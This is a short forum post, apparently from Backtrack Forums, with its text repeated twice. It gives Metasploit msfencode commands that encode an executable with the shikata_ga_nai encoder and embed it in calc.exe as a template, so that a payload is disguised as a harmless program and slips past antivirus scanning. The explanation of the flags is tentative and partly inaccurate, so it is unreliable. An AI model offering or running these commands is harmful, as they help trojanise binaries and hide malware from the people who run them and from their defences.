author:MartinBishop edit:Samael from:Backtrack Forums
use this command:
msfencode -l
msfencode -i /root/Desktop/daten/myfile.exe -e x86/shikata_ga_nai -x /root/Desktop/daten/calc.exe -k -o /root/Desktop/daten/myNEWfile.exe
when i got it right then is -i my file which i want to encode, -e which encoder i wanna use, -x describes what other process will be spawned and -o is just the output file.
use this command:
msfencode -l
msfencode -i /root/Desktop/daten/myfile.exe -e x86/shikata_ga_nai -x /root/Desktop/daten/calc.exe -k -o /root/Desktop/daten/myNEWfile.exe
when i got it right then is -i my file which i want to encode, -e which encoder i wanna use, -x describes what other process will be spawned and -o is just the output file.